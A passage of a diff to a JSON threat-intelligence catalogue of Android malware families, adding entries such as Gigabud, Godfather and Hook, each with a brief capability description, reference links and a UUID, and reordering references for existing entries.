+ "description": "Gigabud is the name of an Android Remote Access Trojan (RAT) Android that can record the victim's screen and steal banking credentials by abusing the Accessibility Service. Gigabud masquerades as banking, shopping, and other applications. Threat actors have been observed using deceptive websites to distribute Gigabud RAT.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gigabud",
+ "https://blog.cyble.com/2023/01/19/gigabud-rat-new-android-rat-masquerading-as-government-agencies/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8f188382-7a31-46a5-83c6-5991dfe739ee",
+ "value": "Gigabud"
+ },
{
"description": "Ginp is a mobile banking software targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit cards numbers by implementing overlay attacks. For this, overlay targets are for example the default SMS application. What makes Ginp a remarkable family is how its operators managed to have it remain undetected over time even and it receiving version upgrades over many years. According to ThreatFabric, Ginp has the following features:\r\n\r\nOverlaying: Dynamic (local overlays obtained from the C2)\r\nSMS harvesting: SMS listing\r\nSMS harvesting: SMS forwarding\r\nContact list collection\r\nApplication listing\r\nOverlaying: Targets list update\r\nSMS: Sending\r\nCalls: Call forwarding\r\nC2 Resilience: Auxiliary C2 list\r\nSelf-protection: Hiding the App icon\r\nSelf-protection: Preventing removal\r\nSelf-protection: Emulation-detection.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp",
- "https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/",
- "https://www.youtube.com/watch?v=WeL_xSryj8E",
- "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html",
"https://twitter.com/ESETresearch/status/1269945115738542080",
"https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
- "https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/"
+ "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html",
+ "https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/",
+ "https://muha2xmad.github.io/malware-analysis/ginp/",
+ "https://www.youtube.com/watch?v=WeL_xSryj8E",
+ "https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/"
],
"synonyms": [],
"type": []
@@ -1359,10 +1453,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove",
- "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/",
- "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773",
"https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/",
- "https://www.clearskysec.com/glancelove/"
+ "https://www.clearskysec.com/glancelove/",
+ "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/",
+ "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773"
],
"synonyms": [],
"type": []
@@ -1383,6 +1477,33 @@
"uuid": "a3b6a355-3afe-49ae-9f87-679c6c382943",
"value": "GnatSpy"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goat_rat",
+ "https://labs.k7computing.com/index.php/goatrat-attacks-automated-payment-systems/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f699d295-1072-418b-8aa2-cb36fbd4c6c7",
+ "value": "GoatRAT"
+ },
+ {
+ "description": "According to PCrisk, GodFather is the name of an Android malware targeting online banking pages and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications. Threat actors use GodFather to steal account credentials. Additionally, GodFather can steal SMSs, device information, and other data.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.godfather",
+ "https://muha2xmad.github.io/malware-analysis/godfather/",
+ "https://blog.group-ib.com/godfather-trojan"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8e95a9d5-08fb-4f11-b70a-622148bd1e62",
+ "value": "Godfather"
+ },
{
"description": "",
"meta": {
@@ -1414,8 +1535,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.goontact",
- "https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail",
- "https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/"
+ "https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/",
+ "https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail"
],
"synonyms": [],
"type": []
@@ -1428,8 +1549,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.gplayed",
- "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html",
- "https://blog.talosintelligence.com/2018/10/gplayerbanker.html"
+ "https://blog.talosintelligence.com/2018/10/gplayerbanker.html",
+ "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html"
],
"synonyms": [],
"type": []
@@ -1468,12 +1589,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff",
+ "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html",
+ "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
"https://blog.talosintelligence.com/2019/10/gustuffv2.html",
"https://www.group-ib.com/media/gustuff/",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
- "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
- "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html"
+ "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html"
],
"synonyms": [],
"type": []
@@ -1501,8 +1622,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw",
- "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-hawkshaw",
- "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/"
+ "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/",
+ "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-hawkshaw"
],
"synonyms": [],
"type": []
@@ -1515,9 +1636,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.henbox",
+ "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/",
"https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
- "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/"
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/"
],
"synonyms": [],
"type": []
@@ -1530,8 +1651,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.hermit",
- "https://www.lighthousereports.nl/investigation/revealing-europes-nso",
"https://de.lookout.com/blog/hermit-spyware-discovery",
+ "https://www.lighthousereports.nl/investigation/revealing-europes-nso",
"https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/"
],
"synonyms": [],
@@ -1558,11 +1679,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-hiddenads-malware-that-runs-automatically-and-hides-on-google-play-1m-users-affected/",
"https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users",
- "https://twitter.com/LukasStefanko/status/1136568939239137280",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-hiddenads-malware-that-runs-automatically-and-hides-on-google-play-1m-users-affected/",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://securelist.com/mobile-malware-evolution-2019/96280/"
+ "https://twitter.com/LukasStefanko/status/1136568939239137280"
],
"synonyms": [],
"type": []
@@ -1583,22 +1704,37 @@
"uuid": "96bea6aa-3202-4352-8e36-fa05c677c0e8",
"value": "HilalRAT"
},
+ {
+ "description": "According to ThreatFabric, this is a malware family based on apk.ermac. The name hook is the self-advertised named by its vendor DukeEugene. It provides WebSocket communication and has RAT capabilities.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hook",
+ "https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware",
+ "https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c101bc42-1011-43f6-9d30-629013c318cd",
+ "value": "Hook"
+ },
{
"description": "Avira states that Hydra is an Android BankBot variant, a type of malware designed to steal banking credentials. The way it does this is by requesting the user enables dangerous permissions such as accessibility and every time the banking app is opened, the malware is hijacking the user by overwriting the legit banking application login page with a malicious one. The goal is the same, to trick the user to enter his login credentials so that it will go straight to the malware authors.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra",
- "https://muha2xmad.github.io/malware-analysis/hydra/",
"https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html",
- "https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/",
- "https://cryptax.medium.com/android-bianlian-payload-61febabed00a",
- "https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5",
- "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726",
- "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
- "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221",
- "https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0",
"https://twitter.com/muha2xmad/status/1570788983474638849",
- "https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/"
+ "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
+ "https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/",
+ "https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0",
+ "https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5",
+ "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221",
+ "https://cryptax.medium.com/android-bianlian-payload-61febabed00a",
+ "https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/",
+ "https://muha2xmad.github.io/malware-analysis/hydra/",
+ "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace",
+ "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726"
],
"synonyms": [],
"type": []
@@ -1627,9 +1763,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.irata",
+ "https://onecert.ir/portal/blog/irata",
"https://twitter.com/muha2xmad/status/1562831996078157826",
- "https://muha2xmad.github.io/malware-analysis/irata/",
- "https://onecert.ir/portal/blog/irata"
+ "https://muha2xmad.github.io/malware-analysis/irata/"
],
"synonyms": [],
"type": []
@@ -1664,22 +1800,22 @@
"value": "JadeRAT"
},
{
- "description": "",
+ "description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google’s official app store with the help of its trail signatures which includes updating the virus’s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users’ personal information including contact details, device data, WAP services, and SMS messages.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker",
- "https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/",
- "https://cryptax.medium.com/tracking-android-joker-payloads-with-medusa-static-analysis-and-patience-672348b81ac2",
- "https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1",
"https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/",
"https://www.microsoft.com/security/blog/2022/06/30/toll-fraud-malware-how-an-android-application-can-drain-your-wallet/",
- "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html",
- "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html",
+ "https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1",
"https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/",
- "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
+ "https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/",
"https://labs.k7computing.com/?p=22199",
- "https://muha2xmad.github.io/malware-analysis/hydra/",
- "https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451"
+ "https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451",
+ "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html",
+ "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html",
+ "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
+ "https://cryptax.medium.com/tracking-android-joker-payloads-with-medusa-static-analysis-and-patience-672348b81ac2",
+ "https://muha2xmad.github.io/malware-analysis/hydra/"
],
"synonyms": [
"Bread"
@@ -1735,9 +1871,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.little_looter",
- "https://twitter.com/malwrhunterteam/status/1337684036374945792",
- "https://www.youtube.com/watch?v=nilzxS9rxEM",
"https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-The-Kitten-That-Charmed-Me-The-9-Lives-Of-A-Nation-State-Attacker.pdf",
+ "https://www.youtube.com/watch?v=nilzxS9rxEM",
+ "https://twitter.com/malwrhunterteam/status/1337684036374945792",
"https://securityintelligence.com/posts/itg18-operational-security-errors-plague-iranian-threat-group/"
],
"synonyms": [],
@@ -1764,13 +1900,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot",
- "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html",
- "https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view",
- "https://muha2xmad.github.io/mal-document/lokibotpdf/",
+ "https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/Lokibot/Machete-Weapons-Lokibot/Machete%20weapons-Lokibot_EN.pdf",
"https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
- "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://muha2xmad.github.io/mal-document/lokibotpdf/",
+ "https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view",
"https://isc.sans.edu/diary/27282",
- "https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/Lokibot/Machete-Weapons-Lokibot/Machete%20weapons-Lokibot_EN.pdf"
+ "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html",
+ "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/"
],
"synonyms": [],
"type": []
@@ -1809,9 +1945,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
+ "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
"https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html",
- "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware"
+ "https://securelist.com/mobile-malware-evolution-2019/96280/"
],
"synonyms": [
"ExoBot"
@@ -1841,8 +1977,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot",
- "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/",
- "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html"
+ "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html",
+ "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/"
],
"synonyms": [],
"type": []
@@ -1855,9 +1991,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa",
- "https://twitter.com/ThreatFabric/status/1285144962695340032",
"https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html",
- "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html"
+ "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
+ "https://twitter.com/ThreatFabric/status/1285144962695340032"
],
"synonyms": [
"Gorgona"
@@ -1872,9 +2008,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.meterpreter",
- "https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12",
+ "https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe",
+ "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
"https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html",
- "https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe"
+ "https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12"
],
"synonyms": [],
"type": []
@@ -1882,6 +2019,19 @@
"uuid": "e1ae3e4e-5aaf-4ffe-ba2f-7871507f6d52",
"value": "Meterpreter (Android)"
},
+ {
+ "description": "Check Point has identified samples of this spyware being distributed since 2015. No samples were found on Google Play, meaning they were likely through other channels like social engineering.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mobile_order",
+ "https://research.checkpoint.com/2022/never-truly-left-7-years-of-scarlet-mimics-mobile-surveillance-campaign-targeting-uyghurs/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ee19588f-9752-4516-85f4-de18acfc64b3",
+ "value": "MobileOrder"
+ },
{
"description": "Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques as well as the ability to install an attacker-specified certificate to the trusted certificates on an infected device that would allow for man-in-the-middle (MITM) attacks.\r\nAccording to Lookout researchers, It is believed to be developed by Special Technology Center (STC), which is a Russian defense contractor sanctioned by the U.S. Government in connection to alleged interference in the 2016 US presidential elections.",
"meta": {
@@ -1900,20 +2050,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao",
- "https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/",
+ "https://www.team-cymru.com/post/moqhao-part-3-recent-global-targeting-trends",
"https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html",
- "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf",
- "https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/",
- "https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1",
- "https://securelist.com/roaming-mantis-part-v/96250/",
- "https://www.xanhacks.xyz/p/moqhao-malware-analysis",
+ "https://www.telekom.com/en/blog/group/article/moqhao-masters-new-tricks-1031484",
"https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html",
- "https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/",
- "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
- "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
"https://team-cymru.com/blog/2021/08/11/moqhao-part-1-5-high-level-trends-of-recent-campaigns-targeting-japan/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/"
+ "https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/",
+ "https://www.xanhacks.xyz/p/moqhao-malware-analysis",
+ "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/",
+ "https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/",
+ "https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1",
+ "https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
+ "https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/",
+ "https://securelist.com/roaming-mantis-part-v/96250/",
+ "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
+ "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf"
],
"synonyms": [
"Shaoye",
@@ -1950,6 +2103,20 @@
"uuid": "0a53ace4-98ae-442f-be64-b8e373948bde",
"value": "MysteryBot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.nexus",
+ "https://liansecurity.com/#/main/news/RWt_ZocBrFZDfCElFqw_/detail",
+ "https://www.cleafy.com/cleafy-labs/nexus-a-new-android-botnet"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fe0b4e6e-268e-4c63-a095-bf1ddff95055",
+ "value": "Nexus"
+ },
{
"description": "",
"meta": {
@@ -1999,10 +2166,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance",
- "https://securelist.com/apt-phantomlance/96772/",
- "https://securelist.com/it-threat-evolution-q2-2020/98230",
"https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://securelist.com/it-threat-evolution-q2-2020/98230",
+ "https://securelist.com/apt-phantomlance/96772/",
"https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf",
"https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html"
],
@@ -2027,13 +2194,39 @@
"uuid": "ff00bbb6-6856-4cf5-adde-d1cc536dd0e2",
"value": "PhoneSpy"
},
+ {
+ "description": "According to Mandiant, PINEFLOWER is an Android malware family capable of a wide range of backdoor functionality, including stealing system inform information, logging and recording phone calls, initiating audio recordings, reading SMS inboxes and sending SMS messages. The malware also has features to facilitate device location tracking, deleting, downloading, and uploading files, reading connectivity state, speed, and activity, and toggling Bluetooth, Wi-Fi, and mobile data settings.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pineflower",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a17a7c5d-0a8f-42e7-b4c9-63c258267776",
+ "value": "PINEFLOWER"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pixpirate",
+ "https://www.cleafy.com/cleafy-labs/pixpirate-a-new-brazilian-banking-trojan"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cdf707bd-a8b0-4ee3-917d-a56b11f30206",
+ "value": "PixPirate"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.pixstealer",
- "https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/",
- "https://research.checkpoint.com/2021/pixstealer-a-new-wave-of-android-banking-trojans-abusing-accessibility-services/"
+ "https://research.checkpoint.com/2021/pixstealer-a-new-wave-of-android-banking-trojans-abusing-accessibility-services/",
+ "https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/"
],
"synonyms": [
"BrazKing"
@@ -2048,9 +2241,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.pjobrat",
- "https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ",
"https://cybleinc.com/2021/06/22/android-application-disguised-as-dating-app-targets-indian-military-personnel/",
- "https://labs.k7computing.com/?p=22537"
+ "https://labs.k7computing.com/?p=22537",
+ "https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ"
],
"synonyms": [],
"type": []
@@ -2076,8 +2269,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30",
- "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/",
- "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/"
+ "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/",
+ "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/"
],
"synonyms": [
"Popr-d30"
@@ -2125,6 +2318,20 @@
"uuid": "cdaa0a6d-3709-4e6f-8807-fff388baaba0",
"value": "Rafel RAT"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rambleon",
+ "https://medium.com/s2wblog/scarcruft-bolsters-arsenal-for-targeting-individual-android-devices-97d2bcef4ab",
+ "https://interlab.or.kr/archives/2567"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "41ab3c99-297c-465c-8375-3e9f7ce4b996",
+ "value": "RambleOn"
+ },
{
"description": "",
"meta": {
@@ -2138,6 +2345,19 @@
"uuid": "65a8e406-b535-4c0a-bc6d-d1bec3c55623",
"value": "Rana"
},
+ {
+ "description": "RatMilad, a newly discovered Android spyware, has been stealing data from mobile devices in the Middle East.\r\nThe malware is spread through links on social media and pretends to be applications for services like VPN and phone number spoofing. Unwary users download these trojan applications and grant access to malware. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ratmilad",
+ "https://socradar.io/new-spyware-ratmilad-targets-middle-eastern-mobile-devices"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "542c3e5e-2124-4c36-af05-65893974d5ce",
+ "value": "RatMilad"
+ },
{
"description": "",
"meta": {
@@ -2156,8 +2376,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores",
- "https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html"
+ "https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores"
],
"synonyms": [],
"type": []
@@ -2183,12 +2403,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe",
- "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html",
"http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/",
+ "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html",
"http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html",
"http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html",
"https://www.govcert.admin.ch/blog/33/the-retefe-saga",
- "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html"
+ "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html"
],
"synonyms": [],
"type": []
@@ -2228,25 +2448,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis",
+ "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/",
"https://securelist.com/roaming-mantis-reaches-europe/105596/",
"https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/",
- "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf",
- "https://securelist.com/roaming-mantis-part-v/96250/",
